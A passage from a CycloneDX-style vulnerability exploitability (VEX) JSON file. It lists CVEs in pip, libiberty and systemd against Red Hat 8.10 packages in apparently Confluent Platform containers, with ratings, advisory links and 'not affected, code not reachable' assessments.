          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-20225",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        20
      ],
      "description": "An issue was discovered in pip (all versions) because it installs the version with the highest version number, even if the user had intended to obtain a private package from a private index. This only affects use of the --extra-index-url option, and exploitation requires that the package does not already exist in the public index (and thus the attacker can put the package there with an arbitrary version number). NOTE: it has been reported that this is intended functionality and the user is responsible for using --extra-index-url securely",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-20225"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-20225"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1835736"
        },
        {
          "url": "https://cowlicks.website/posts/arbitrary-code-execution-from-pips-extra-index-url.html"
        },
        {
          "url": "https://lists.apache.org/thread.html/rb1adce798445facd032870d644eb39c4baaf9c4a7dd5477d12bb6ab2@%3Cgithub.arrow.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20225"
        },
        {
          "url": "https://pip.pypa.io/en/stable/news/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-20225"
        }
      ],
      "published": "2020-05-08T18:15:10+00:00",
      "updated": "2026-06-17T01:52:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable. "
      }
    },
    {
      "id": "CVE-2018-20657",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        772
      ],
      "description": "The demangle_template function in cplus-dem.c in GNU libiberty, as distributed in GNU Binutils 2.31.1, has a memory leak via a crafted string, leading to a denial of service (memory consumption), as demonstrated by cxxfilt, a related issue to CVE-2018-12698.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-20657"
        },
        {
          "url": "http://www.securityfocus.com/bid/106444"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2019:3352"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-20657"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=88539"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2018-20657.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2019-3352.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20657"
        },
        {
          "url": "https://support.f5.com/csp/article/K62602089"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-20657"
        }
      ],
      "published": "2019-01-02T14:29:00+00:00",
      "updated": "2026-06-17T01:53:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-20839",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        }
      ],
      "description": "systemd 242 changes the VT1 mode upon a logout, which allows attackers to read cleartext passwords in certain circumstances, such as watching a shutdown, or using Ctrl-Alt-F1 and Ctrl-Alt-F2. This occurs because the KDGKBMODE (aka current keyboard mode) check is mishandled.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-20839"
        },
        {
          "url": "http://www.securityfocus.com/bid/108389"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-20839"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1803993"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/9725f1a10f80f5e0ae7d9b60547458622aeb322f"
        },
        {
          "url": "https://github.com/systemd/systemd/pull/12378"
        },
        {
          "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20839"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20190530-0002/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-20839"
        }
      ],
      "published": "2019-05-17T04:29:00+00:00",
      "updated": "2026-06-17T01:53:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
